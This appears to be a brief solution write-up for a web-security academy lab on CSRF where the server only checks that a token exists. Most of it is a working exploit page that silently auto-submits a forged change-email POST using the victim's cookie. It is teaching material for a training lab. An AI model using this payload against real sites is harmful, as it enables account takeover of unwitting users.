This web application is vulnerable to CSRF. An API endpoint and its parameters are well known, and actions can be taken using a user’s cookie without verifying the redirecting page. The browser reuses the cookie for this site and submits a POST request on the user’s behalf, forging the request. Usually a CSRF token is used to prevent this, however, the server only checks if the token is present, not if it is correct.
Solution:
<html>
<body>
<form
action="https://3.web-security-academy.net/my-account/change-email"
method="POST"
>
<input
type="hidden"
name="email"
value="pwned@evil-user.net"
/>
</form>
<script>
history.pushState("", "", "/")
document.forms[0].submit()
</script>
</body>
</html>